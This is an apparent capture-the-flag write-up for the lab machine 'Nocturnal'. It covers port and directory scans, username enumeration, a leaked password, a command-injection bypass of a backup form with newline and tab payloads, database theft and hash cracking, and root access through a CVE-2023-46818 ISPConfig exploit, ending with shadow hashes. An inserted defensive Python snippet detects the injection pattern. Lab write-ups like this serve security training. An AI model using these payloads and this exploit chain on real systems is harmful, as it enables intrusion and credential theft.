Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.64
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 15:12 JST
Nmap scan report for 10.10.11.64
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_ 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.63 seconds

80

Add a hosts entry:

10.10.11.64 nocturnal.htb

The site is an online file upload and viewing service:

Directory scan

The directory scan shows backups, uploads and admin:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://nocturnal.htb/

/admin.php (Status: 302) [Size: 0] [--> login.php]
/backups (Status: 301) [Size: 178] [--> http://nocturnal.htb/backups/]
/index.php (Status: 200) [Size: 1524]
/uploads (Status: 403) [Size: 162]

nocturnal

Register an arbitrary account and log in, test the upload, and notice that viewing a file takes two parameters: the username and the file name:

Username enumeration

Simple testing shows that the username and the file name are not bound together: a non-existent username returns "User not found", and because the username check runs before the file-name check, usernames can be enumerated:

ffuf -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt:FUZZ -u "http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf" -H "Cookie: PHPSESSID=ik19m9dtqgc52b49o5ff80eb7l"  -fs 2985

abc [Status: 200, Size: 3134, Words: 1177, Lines: 129, Duration: 94ms]
abcd [Status: 200, Size: 3295, Words: 1180, Lines: 129, Duration: 94ms]
admin [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 94ms]
amanda [Status: 200, Size: 3189, Words: 1176, Lines: 129, Duration: 95ms]
test [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 93ms]
test2 [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 93ms]

privacy.odt

When the username exists but the file does not, the response lists the available file names; for amanda there is a privacy.odt file:

Opening this file gives a "damaged" warning; either let Word auto-repair it or simply grep it directly, which yields a password:

arHkG7HAI68X8s1J

Admin Panel

Logging in as amanda with that password shows an admin panel:

backup

There is a backup function that takes a password and runs; combined with the admin.php source, it can be seen that a system command is executed directly and its output is returned:

There is a basic filter:

Command injection

Basic bypass: %0a as a newline and %09 in place of spaces:

This way the output is echoed back:

miao%0abash%09-c%09"whoami"%0a
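As an added defender-side example (not code from this writeup or from the target application): the payload above works because the backup form only blocklists a few metacharacters, while a newline and a tab still separate commands and arguments for the shell. The fix is a strict allowlist on the password field before it ever reaches a shell, and the same decoding logic can be used to flag such values in captured request bodies. The form field name `password` and the sample bodies are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Allowlist: a bounded set of printable characters with no whitespace, control
# characters or shell metacharacters. Newline (%0a) and tab (%09), the two bytes
# that slip past a naive blocklist of ';', '|', '&' and space, are rejected.
SAFE_PASSWORD = re.compile(r"[A-Za-z0-9_.@!#%^*+=-]{1,64}")


def is_safe_backup_password(value: str) -> bool:
    """Return True only if the whole value matches the allowlist."""
    return SAFE_PASSWORD.fullmatch(value) is not None


# Shell separators and control characters a blocklist filter may have missed.
SHELL_SEPARATORS = re.compile(r"[\x00-\x1f;|&`$]")


def suspicious_fields(form_body: str, field: str = "password"):
    """Decode an application/x-www-form-urlencoded body (parse_qs handles the
    percent-decoding) and return the values of `field` that still contain a
    shell separator or a control character after decoding."""
    values = parse_qs(form_body, keep_blank_values=True).get(field, [])
    return [v for v in values if SHELL_SEPARATORS.search(v)]


# Constructed sample request bodies; the field name is an assumption.
SAMPLE_BODIES = [
    "password=arHkG7HAI68X8s1J",                   # benign value
    'password=miao%0abash%09-c%09"whoami"%0a',     # newline/tab bypass
    "password=backup%3Bid",                        # plain ';' separator
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body, "->", suspicious_fields(body) or "clean")
```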

database

In addition, dashboard.php reveals the database file path; using the command injection, copy the database file so that the backup contains it:

$db = new SQLite3('../nocturnal_database/nocturnal_database.db');

miao%0acp%09../nocturnal_database/nocturnal_database.db%09.

Then inspect the database, extract the hashes and crack them:

sqlite> select * from users;
1|admin|d725aeba143f575736b07e045d8ceebb
2|amanda|df8b20aa0c935023f99ea58358fb63c4
4|tobias|55c82b1ccd55ab219b3b109b07d5061d

tobias slowmotionapocalypse

user flag

Log in over SSH with the obtained tobias credentials:

ISPConfig

Port 8080 is listening locally; forward it out and it turns out to be ISPConfig:

ssh tobias@10.10.11.64 -L 8085:127.0.0.1:8080

The admin password is the same as tobias's password:

admin
slowmotionapocalypse

3.2.10p1

CVE-2023-46818

A search turns up the relevant vulnerability:

Privilege escalation & root flag

The exploit gets root in one shot:

python3 exploit.py http://127.0.0.1:8085/ admin slowmotionapocalypse

shadow

root:$6$sJtQT08ZefRr6Awp$DBlWukQpaXmhYmGm52nQIqvRLc9DyXwxbDFM9F87xQcxX7B.e82r2/g7L3KZc4m7ywzuu6KGQsNi6vpguIXvi/:20014:0:99999:7:::
tobias:$6$kg9idJil/duVwNce$/29r1quOnEmdLDmeujzUUioimkjZTR/YqjiIk74u5K4X6N4NouhWoL4d3wQ4DZQpHnqZ1URYVATEb5/gz2AGV1:20014:0:99999:7:::

References